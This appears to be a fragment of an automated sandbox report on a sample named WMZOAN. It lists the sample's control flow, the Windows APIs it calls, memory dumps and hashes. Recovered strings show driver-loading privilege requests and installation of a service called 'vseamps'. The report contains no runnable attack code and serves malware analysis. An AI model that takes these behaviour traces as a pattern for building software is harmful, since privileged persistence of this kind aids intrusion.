                                            • Instruction ID: 944849546ce85cf1f9131d301e0734831be6a2f6486a844c638dfe3984c561d3
                                            • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                            • Instruction Fuzzy Hash: 94316B7AB15B8189E701DFB1D8543AD73A5EB88788F188675EE8D27B44EF38D152C340

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 196 7ffb23b011b0-7ffb23b01207 197 7ffb23b01209-7ffb23b01222 call 7ffb23b11490 196->197 198 7ffb23b0124b-7ffb23b0124e 196->198 207 7ffb23b01224-7ffb23b01227 197->207 208 7ffb23b0123e 197->208 200 7ffb23b014b8-7ffb23b014bf 198->200 201 7ffb23b01254-7ffb23b01280 198->201 202 7ffb23b014c3-7ffb23b014ea call 7ffb23b01b70 200->202 204 7ffb23b012f6-7ffb23b01335 call 7ffb23b01b90 call 7ffb23b10a50 201->204 205 7ffb23b01282-7ffb23b0128f 201->205 233 7ffb23b01340-7ffb23b013cb 204->233 210 7ffb23b01295-7ffb23b0129c 205->210 211 7ffb23b014f1-7ffb23b014f6 call 7ffb23b01a40 205->211 213 7ffb23b01229-7ffb23b0123c call 7ffb23b11490 207->213 214 7ffb23b01241-7ffb23b01246 207->214 208->214 217 7ffb23b012c7-7ffb23b012cf call 7ffb23b01b90 210->217 218 7ffb23b0129e-7ffb23b012a5 210->218 223 7ffb23b014f7-7ffb23b014ff call 7ffb23b01110 211->223 213->207 213->208 214->198 231 7ffb23b012d2-7ffb23b012f1 call 7ffb23b10e10 217->231 218->223 224 7ffb23b012ab-7ffb23b012b3 call 7ffb23b01b90 218->224 234 7ffb23b012b9-7ffb23b012c5 224->234 235 7ffb23b014eb-7ffb23b014f0 call 7ffb23b079cc 224->235 231->204 233->233 237 7ffb23b013d1-7ffb23b013da 233->237 234->231 235->211 238 7ffb23b013e0-7ffb23b01402 237->238 241 7ffb23b01404-7ffb23b0140e 238->241 242 7ffb23b01411-7ffb23b0142c 238->242 241->242 242->238 244 7ffb23b0142e-7ffb23b01436 242->244 245 7ffb23b01498-7ffb23b014a6 244->245 246 7ffb23b01438-7ffb23b0143b 244->246 248 7ffb23b014a8-7ffb23b014b5 call 7ffb23b01bcc 245->248 249 7ffb23b014b6 245->249 247 7ffb23b01440-7ffb23b01449 246->247 250 7ffb23b01455-7ffb23b01465 247->250 251 7ffb23b0144b-7ffb23b01453 247->251 248->249 249->202 253 7ffb23b01467-7ffb23b0146e 250->253 254 7ffb23b01470-7ffb23b01496 250->254 251->250 253->254 254->245 254->247
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                            • String ID:
                                            • API String ID: 73155330-0
                                            • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                            • Instruction ID: 8fda1976ad6f55f9a084edc51870c7c4382a086b65423192ea9e7f295f3919bf
                                            • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                            • Instruction Fuzzy Hash: 47814A6AA186C245E6168F35DC842BDA694EF56BC4F188335EFD973792DF3CE0928300

                                            Non-executed Functions

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                            • String ID:
                                            • API String ID: 3526400053-0
                                            • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                            • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                            • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                            • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                            • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                            • API String ID: 3408796845-4213300970
                                            • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                            • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                            • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                            • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                            • String ID: ampStopSingletone: logging ended
                                            • API String ID: 2048888615-3533855269
                                            • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                            • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                            • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                            • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                            • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                            • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                            • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ErrorLastManagerOpen$FileModuleName
                                            • String ID: /remove$/service$vseamps
                                            • API String ID: 67513587-3839141145
                                            • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                            • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                            • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                            • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                            APIs
                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                            • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                            • GetProcAddress.KERNEL32 ref: 000000014000F117
                                              • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: AddressProc$Load$Library
                                            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                            • API String ID: 3981747205-232180764
                                            • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                            • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                            • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                            • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                            • String ID:
                                            • API String ID: 4284112124-0
                                            • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                            • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                            • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                            • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                            • String ID: vseamps
                                            • API String ID: 3693165506-3944098904
                                            • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                            • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                            • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                            • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                            APIs
                                            • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: FileModuleName
                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                            • API String ID: 514040917-4022980321
                                            • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                            • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                            • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                            • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                            • String ID:
                                            • API String ID: 2057259594-0
                                            • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                            • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                            • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                            • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                            • String ID:
                                            • API String ID: 3103264659-0
                                            • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                            • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                            • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                            • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                            • Instruction ID: 274ec6201cabdce5605224432e618fbe3bc74b4e7e456fbef5793b002dbf2ad5
                                            • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                            • Instruction Fuzzy Hash: 0F313EB6A19BC18AEB618F60EC883ED7361FB44744F48413ADA8E57B94DF38D548CB10
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                            • String ID:
                                            • API String ID: 1269745586-0
                                            • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                            • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                            • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                            • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                            • Instruction ID: 56505e40301d2caaa35ed5a48393f25abd5960e1a323e7dea075dab34068c172
                                            • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                            • Instruction Fuzzy Hash: 97315C7AA18BC185DB61CF35E8883AE63A4FB84754F580175EACD57B55DF38C145CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                            • String ID:
                                            • API String ID: 1445889803-0
                                            • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                            • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                            • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                            • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                            APIs
                                            • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                            • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                            • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                            • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                            • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContext
                                            • String ID:
                                            • API String ID: 2202868296-0
                                            • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                            • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                            • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                            • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ExceptionRaise_clrfp
                                            • String ID:
                                            • API String ID: 15204871-0
                                            • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
